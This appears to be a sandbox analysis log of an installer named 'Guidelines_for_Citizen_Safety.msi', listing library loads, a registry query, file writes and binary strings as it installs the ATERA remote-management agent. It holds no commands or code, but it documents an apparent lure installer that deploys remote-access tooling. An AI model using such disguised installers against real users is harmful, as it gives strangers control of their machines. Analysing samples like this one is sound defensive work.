                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: riched20.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: usp10.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msls31.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cabinet.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile written: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: Guidelines_for_Citizen_Safety.msiStatic file information: File size 2994176 > 1048576
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb2|1\F source: rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000000.1743436849.000002AC4FE22000.00000002.00000001.01000000.00000018.sdmp, AgentPackageAgentInformation.exe.15.dr
                              Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1452340287.0000000007450000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1450208878.0000000002F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1602449484.00000000070A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, AlphaControlAgentInstallation.dll.5.dr, AlphaControlAgentInstallation.dll.6.dr, AlphaControlAgentInstallation.dll.18.dr, AlphaControlAgentInstallation.dll.4.dr
